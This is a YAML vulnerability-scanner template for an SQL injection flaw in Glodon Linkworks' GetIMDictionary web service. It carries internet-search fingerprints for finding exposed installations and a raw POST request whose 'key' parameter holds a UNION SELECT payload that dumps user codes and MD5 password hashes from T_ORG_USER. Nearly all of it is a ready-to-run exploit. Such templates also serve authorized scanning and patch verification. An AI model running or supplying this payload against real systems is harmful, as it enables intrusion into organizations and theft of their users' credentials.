id: glodon-linkworks-sql-GetIMDictionary

info:
  name: glodon-linkworks-sql-GetIMDictionary
  author: p1z
  severity: critical
  description: |
    广联达 linkworks GetIMDictionary 文件 key 参数存在sql注入漏洞
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/ca1918ddbaedb053ce00e6fb2e40af5df2eaad58/docs/wiki/webapp/%E5%B9%BF%E8%81%94%E8%BE%BE/%E5%B9%BF%E8%81%94%E8%BE%BE%20Linkworks%20GetIMDictionary%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    fofa-query: fid="/yV4r5PdARKT4jaqLjJYqw=="
    hunter-query: web.body="/Services/Identification/Server/"
    verified: true
  tags: 2023,glodon,linkworks,sql 

requests:
  - raw:
    - |
      POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
      Host: {{Hostname}}
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

      key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

    matchers:
      - type: word
        words:
          - 'admin'
        part: body